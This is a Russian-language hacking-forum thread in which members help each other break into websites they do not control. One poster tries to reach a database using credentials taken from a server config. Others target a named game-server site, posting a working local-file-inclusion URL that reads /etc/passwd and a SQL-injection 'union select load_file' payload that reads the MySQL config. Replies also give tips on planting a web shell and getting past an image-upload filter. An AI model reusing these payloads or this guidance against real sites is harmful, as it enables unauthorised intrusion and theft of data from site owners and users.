Ребят подскажите, выдрал с сервера конфиг зенда, следующего вида db.adapter = "pdo_mysql" db.host = "blabla" db.port = "3306" db.username = "blabla" db.password = "blabla" db.dbname = "blabla" db.charset ="utf8" Порт из вне открыт к дб, а вот коннект сделать не могу, прочитал в разделе коддинга, что может быть строка в дб adress(то есть ip с которых можно подключиться к дб.) один разрешенный ip знаю, как подделать коннект с тем ip что знаю? или моя идея бредовая?
Здравствуйте, не могли бы вы подсказать ? выдает на страничке: Warning: include_once(../config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1 Warning: include_once() [function.include]: Failed opening '../config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1 Это несет в себе уязвимость ?
информация очень скудна...при каких обстоятельствах появилось данное сообщение? что делал? и как? с такой инфой тебе никто ничего не скажет, экстрасенсов на форуме не наблюдал
это лк фришного айона ontarioworld.ru/usercp дижок как бы dle. а ошибка вылазит в http://ontarioworld.ru/usercp/prem.php?p=addbal также есть ошибка в http://ontarioworld.ru/usercp/cp.php в отсальном дыр нет Сильно не пинайте если что-то не так описал
ну смотри, если на сайте есть какая нибудь ошибка, вернее текст какой нить ошибки без каких либо действий со стороны пользователя (имею в виду подставление ковычки, иаменение пост или гет запроса) , то это не значит что на ресурсе есть уязвимость..может она на данном ресурсе и есть.. но за тебя никто ничего делать не будет, предпринимай действия...и тогда уже обращайся
Zalepoks Code: http://ontarioworld.ru/usercp/prem.php?p=../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ Флуданул,доволен?Тут люди вопросы задают,а ты какой-то бред несешь про ошибки,даже сам не понимая про что говоришь!!111 Если ошибка на сайте,то сайт хекнут,акуеть логика!11 Думаешь блеснул своим хекирским мастерством и показал смекалку,ответив в этой теме?Ты только лишний раз показал обратное...
Ребят никто так и не ответил на мой пост https://forum.antichat.ru/showthread.php?p=2539364#post2539364, логику не понимаю, тут тема для флуда и гнобения других мемберов?
Парни, остыньте. Вполне возможно, что так и есть. Тогда ниче ты не сделаешь, там даже может быть IP локалхоста или локальный IP из их подсети. IP спуфинг невозможен.
вот могу сказать на примере, если логиниться на шелле с этого сервера к БД, без проблем Логиниться к этой же БД с другого шелла, возникают проблемы, никогда не получалось залогинться... Попробуй через проги которые есть специально для соединения к БД (http://www.trans-manager.ru/doc/_login.htm) попробуй. И есть еще прога WinSCP
Я не флужу, и ты не флуди. Тема для вопросов и я их задаю здесь. Добрый) человек ответит, остальных прошу мимо. Сайт связан с логин сервером. И я в курсе что он уже хакнут, 100% Но не могу найти дырку, для заливки. Насчет etc/passwd он не содержит пароли, как я понимаю пароли затенены. Есть какое-нибудь направление? Дальше бы я сам разобрался. Как говориться начинать всегда тяжело))
Наверняка коннект к БД разрешен только с локалки или из подсети хостера. У ТС наверняка нет шелла на том серваке.
Во первых спасибо за то что откликнулся. База находится на amazonaws.com (предоставляет кластеры и т.д.), подключение к дб на amazonaws.com идет от хоста где расположен сайт и это 100%. На сайт залить шелл не могу, в админке ничего нет. Есть скрипт PHP AJAX Image Upload, Truly Web 2.0! Но залить кроме изображений ничего не получается запрос обрабатывает по дефолту http://www.atwebresults.com/php_ajax_image_upload/, все варианты проверил. А здаваться, как то не хочется сайт вкусный
дык тебе показали уже, читает /etc/passwd ..дальше ищи логи, сессию и т.д где записывается твои действия...и заливай шелл если получится, показали что читает/etc/passwd не для паролей, их там со времен динозавров не было, просто данный файл 100% существует на никс системах как например boot.ini в винде .
Подскажите делаю через SQLi Helper Load File /etc/mysql/my.cnf Текст отображается но только начало а потом обрывается как можно весь текст конфигурационного файла посмотреть???
Попробуй это сделать не через Sqlhelper. union+select+1,Load_file('/etc/mysql/my.cnf'),3+--+ и посмотреть почему выводится не весь файл
Класно получилось!!! Можно ли через Load_file сделать ls -la? для просмотра папок или нужна другая комманда?
это просто читалка файлов насколько мне известно http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file
